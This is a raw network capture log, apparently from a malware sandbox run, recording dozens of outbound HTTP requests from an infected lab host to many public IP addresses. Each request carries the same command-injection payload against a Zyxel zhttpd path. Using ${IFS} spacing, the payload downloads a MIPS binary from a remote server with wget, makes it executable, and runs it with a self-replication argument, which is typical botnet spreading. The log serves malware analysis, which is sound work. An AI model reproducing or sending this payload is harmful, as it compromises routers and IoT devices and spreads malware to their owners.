                                                            Jan 28, 2024 10:12:22.515691042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            488192.168.2.1338302170.245.126.39443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515726089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            489192.168.2.133523065.18.202.201443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515763044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            490192.168.2.133338653.159.140.89443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515815020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            491192.168.2.1358184211.254.209.0443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515841007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            492192.168.2.133905464.37.237.156443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515894890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            493192.168.2.134297054.6.30.82443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515917063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            494192.168.2.135027258.251.99.214443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515963078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            495192.168.2.135752636.234.135.171443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.515994072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            496192.168.2.1348958184.120.74.29443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516046047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            497192.168.2.135391258.104.161.138443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516073942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            498192.168.2.135556680.153.205.7443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516108036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            499192.168.2.135199075.69.124.45443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516119003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            500192.168.2.135050235.116.14.24443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516170025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            501192.168.2.1358686112.39.127.45443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516184092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            502192.168.2.1349520199.204.204.177443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516210079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            503192.168.2.134550457.78.43.203443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516273975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            504192.168.2.134589289.102.172.233443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516288042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            505192.168.2.135897061.154.78.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516345024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            506192.168.2.1341956114.9.72.62443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516349077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            507192.168.2.1345930195.235.47.220443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516407967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            508192.168.2.133648650.83.213.48443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516437054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            509192.168.2.1352012131.94.3.208443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516438007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            510192.168.2.1345950178.95.210.157443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516478062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            511192.168.2.133797020.179.96.144443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:22.516982079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            512192.168.2.133488018.80.122.143443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:23.519774914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            513192.168.2.1339422123.102.247.3443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:23.519814014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            514192.168.2.133570212.248.41.233443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:23.519850016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            515192.168.2.1339162129.250.249.237443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:23.519946098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            516192.168.2.1354838111.54.2.139443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:23.519956112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            517192.168.2.133709412.56.59.119443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523463011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            518192.168.2.135219620.178.227.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523497105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            519192.168.2.135879678.103.86.169443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523514986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            520192.168.2.134070876.228.218.26443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523570061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            521192.168.2.1352032216.16.204.238443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523610115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            522192.168.2.134818219.79.124.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523641109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            523192.168.2.1343822141.228.172.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523670912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            524192.168.2.1354568106.60.188.190443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523708105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            525192.168.2.1342892211.177.88.169443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523751974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            526192.168.2.13528022.209.162.80443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523787022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            527192.168.2.1344802149.178.221.12443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523825884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            528192.168.2.1349546111.219.230.100443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523861885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            529192.168.2.1343336182.85.231.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523901939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            530192.168.2.1338920137.76.204.148443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523924112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            531192.168.2.1355644145.80.79.202443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523962975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            532192.168.2.134078065.140.10.2443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.523996115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            533192.168.2.1342924118.96.63.128443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524029970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            534192.168.2.1356072104.153.50.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524060965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            535192.168.2.134479073.38.53.122443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524133921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            536192.168.2.134146225.126.118.15443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524161100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            537192.168.2.1359988174.91.213.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524182081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            538192.168.2.136007014.237.8.50443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:24.524518013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            539192.168.2.1341366116.65.249.213443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528007030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            540192.168.2.133857837.45.109.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528070927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            541192.168.2.134026217.101.136.124443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528094053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            542192.168.2.134678864.83.208.50443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528131962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            543192.168.2.13458462.255.99.245443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528177977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            544192.168.2.1335500173.228.57.162443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528198004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            545192.168.2.133723073.254.40.186443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528225899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            546192.168.2.1338800170.247.1.142443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528286934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            547192.168.2.1344652203.159.13.240443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528342962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            548192.168.2.1339698122.151.107.52443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528347969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
